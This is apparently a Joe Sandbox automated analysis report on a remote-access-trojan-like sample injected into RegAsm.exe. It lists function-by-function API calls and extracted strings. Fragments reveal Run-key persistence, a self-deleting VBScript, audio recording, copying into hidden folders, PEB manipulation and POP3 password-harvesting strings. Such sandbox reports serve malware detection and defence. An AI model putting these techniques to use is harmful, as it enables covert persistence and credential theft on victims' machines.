                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                • ExitProcess.KERNEL32 ref: 0040D80B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                • API String ID: 1861856835-1447701601
                                                                • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6BFB8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                • ExitProcess.KERNEL32 ref: 0040D454
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                • API String ID: 3797177996-2483056239
                                                                • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                                • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                                • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                • API String ID: 2649220323-436679193
                                                                • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                • SetEvent.KERNEL32 ref: 0041B2AA
                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                • API String ID: 738084811-2094122233
                                                                • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Write$Create
                                                                • String ID: RIFF$WAVE$data$fmt
                                                                • API String ID: 1602526932-4212202414
                                                                • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                • API String ID: 1646373207-255920310
                                                                • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                  • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                  • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                • _strlen.LIBCMT ref: 10001855
                                                                • _strlen.LIBCMT ref: 10001869
                                                                • _strlen.LIBCMT ref: 1000188B
                                                                • _strlen.LIBCMT ref: 100018AE
                                                                • _strlen.LIBCMT ref: 100018C8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _strlen$File$CopyCreateDelete
                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                • API String ID: 3296212668-3023110444
                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                Function 0040CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0040CE42
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                                • _wcslen.LIBCMT ref: 0040CF21
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CFBF
                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                • _wcslen.LIBCMT ref: 0040D001
                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                • ExitProcess.KERNEL32 ref: 0040D09D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                • API String ID: 1579085052-2309681474
                                                                • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                • _wcslen.LIBCMT ref: 0041C1CC
                                                                • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                • GetLastError.KERNEL32 ref: 0041C204
                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                • GetLastError.KERNEL32 ref: 0041C261
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                • String ID: ?
                                                                • API String ID: 3941738427-1684325040
                                                                • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _strlen
                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                • API String ID: 4218353326-230879103
                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                Function 0044F4AD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                • String ID:
                                                                • API String ID: 3899193279-0
                                                                • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                Function 00414DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                • API String ID: 2490988753-744132762
                                                                • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                                Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                                                • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnumOpen
